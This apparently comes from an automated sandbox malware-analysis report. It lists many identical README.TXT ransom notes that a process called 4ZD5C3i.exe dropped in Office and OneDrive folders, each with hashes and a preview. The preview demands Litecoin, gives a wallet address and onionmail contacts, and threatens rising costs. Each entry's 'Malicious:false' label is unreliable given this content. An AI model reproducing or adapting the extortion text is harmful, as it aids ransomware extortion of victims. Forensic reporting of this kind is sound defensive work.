                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vreg\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vregwow6432\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\Assets\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\Bundle\Assets\src\common\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\Bundle\Assets\src\kfmMoveView\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\Bundle\Assets\src\settingsView\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\Bundle\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\IRMProtectors\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\LogoImages\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\SparsePackage\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\amd64\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\ar\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\arm64\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\as-IN\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\az-Latn-AZ\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
